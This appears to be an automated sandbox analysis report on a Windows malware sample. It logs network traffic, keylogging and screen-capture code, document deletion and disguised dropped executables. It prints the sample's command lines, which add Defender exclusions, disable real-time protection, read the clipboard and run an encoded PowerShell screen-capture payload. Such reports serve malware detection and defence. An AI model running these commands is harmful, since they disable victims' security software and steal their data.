Source: unknown	Network traffic detected: HTTP traffic on port 56234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56257
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56258
Source: unknown	Network traffic detected: HTTP traffic on port 56196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56259
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56265
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56266
Source: unknown	Network traffic detected: HTTP traffic on port 56267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56261
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56262
Source: unknown	Network traffic detected: HTTP traffic on port 56237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56231 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56273 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56269
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56275
Source: unknown	Network traffic detected: HTTP traffic on port 56217 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56271
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56273
Source: unknown	Network traffic detected: HTTP traffic on port 56245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56274
Source: unknown	Network traffic detected: HTTP traffic on port 56259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56270
Source: unknown	Network traffic detected: HTTP traffic on port 56220 -> 443

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:56192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:56193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:56211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:56217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:56222 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:56255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:56266 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: main.exe.12.dr, utils.cs	.Net Code: desktopScreenshot
Source: Update.exe.14.dr, utils.cs	.Net Code: desktopScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: main.exe.12.dr, utils.cs	.Net Code: KeyboardLayout
Source: Update.exe.14.dr, utils.cs	.Net Code: KeyboardLayout

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\EEGWXUHVUG.xlsx	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\NYMMPCEIMA.mp3	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\DUUDTUBZFW.jpg	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\BJZFPPWAPT.pdf	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File deleted: C:\Users\user\AppData\Local\Temp\ ? ? ? ?\Common Files\Desktop\BJZFPPWAPT.mp3	Jump to behavior

System Summary

Very long command line found

Source: C:\ProgramData\Microsoft\based.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\ProgramData\Microsoft\based.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Writes or reads registry keys via WMI

Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EF2B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	7_2_0000020694EF2B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EF253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	7_2_0000020694EF253C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EF28C8 NtEnumerateValueKey,NtEnumerateValueKey,	7_2_0000020694EF28C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7A2244 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	8_2_000001F16E7A2244
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7A2B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	8_2_000001F16E7A2B2C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7A202C NtQuerySystemInformation,StrCmpNIW,	8_2_000001F16E7A202C
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7A27FC NtEnumerateKey,NtEnumerateKey,	8_2_000001F16E7A27FC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7A28C8 NtEnumerateValueKey,NtEnumerateValueKey,	8_2_000001F16E7A28C8
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7A253C NtQueryDirectoryFileEx,GetFileType,StrCpyW,	8_2_000001F16E7A253C

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Code function: 5_2_00427FD3: _wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

5_2_00427FD3

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Logs\SettingSync\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Logs\SettingSync\ebf1f9fa8afd6d
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Resources\audiodg.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File created: C:\Windows\Resources\42af1c969fbb7b
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC8CDC9FB2323C4007AF66CC17D2144E5.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC8CDC9FB2323C4007AF66CC17D2144E5.TMP

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8D89E0	0_2_00007FF72B8D89E0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F6964	0_2_00007FF72B8F6964
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8D1000	0_2_00007FF72B8D1000
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8DACAD	0_2_00007FF72B8DACAD
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F08C8	0_2_00007FF72B8F08C8
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F6418	0_2_00007FF72B8F6418
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8DA47B	0_2_00007FF72B8DA47B
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E2C10	0_2_00007FF72B8E2C10
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F3C10	0_2_00007FF72B8F3C10
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F5C00	0_2_00007FF72B8F5C00
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E1B50	0_2_00007FF72B8E1B50
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8DA2DB	0_2_00007FF72B8DA2DB
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8EDA5C	0_2_00007FF72B8EDA5C
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E39A4	0_2_00007FF72B8E39A4
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E1944	0_2_00007FF72B8E1944
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E2164	0_2_00007FF72B8E2164
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F40AC	0_2_00007FF72B8F40AC
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F08C8	0_2_00007FF72B8F08C8
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E80E4	0_2_00007FF72B8E80E4
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F1874	0_2_00007FF72B8F1874
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8D9800	0_2_00007FF72B8D9800
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F9728	0_2_00007FF72B8F9728
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E1740	0_2_00007FF72B8E1740
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E1F60	0_2_00007FF72B8E1F60
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E8794	0_2_00007FF72B8E8794
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E9EA0	0_2_00007FF72B8E9EA0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8EDEF0	0_2_00007FF72B8EDEF0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F5E7C	0_2_00007FF72B8F5E7C
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E35A0	0_2_00007FF72B8E35A0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E5D30	0_2_00007FF72B8E5D30
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8E1D54	0_2_00007FF72B8E1D54
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8EE570	0_2_00007FF72B8EE570
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F6964	2_2_00007FF72B8F6964
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8D1000	2_2_00007FF72B8D1000
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8DACAD	2_2_00007FF72B8DACAD
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F08C8	2_2_00007FF72B8F08C8
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F6418	2_2_00007FF72B8F6418
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8DA47B	2_2_00007FF72B8DA47B
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E2C10	2_2_00007FF72B8E2C10
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F3C10	2_2_00007FF72B8F3C10
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F5C00	2_2_00007FF72B8F5C00
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E1B50	2_2_00007FF72B8E1B50
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8DA2DB	2_2_00007FF72B8DA2DB
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8EDA5C	2_2_00007FF72B8EDA5C
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E39A4	2_2_00007FF72B8E39A4
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8D89E0	2_2_00007FF72B8D89E0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E1944	2_2_00007FF72B8E1944
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E2164	2_2_00007FF72B8E2164
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F40AC	2_2_00007FF72B8F40AC
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F08C8	2_2_00007FF72B8F08C8
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8E80E4	2_2_00007FF72B8E80E4
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F1874	2_2_00007FF72B8F1874
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8D9800	2_2_00007FF72B8D9800
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F9728	2_2_00007FF72B8F9728
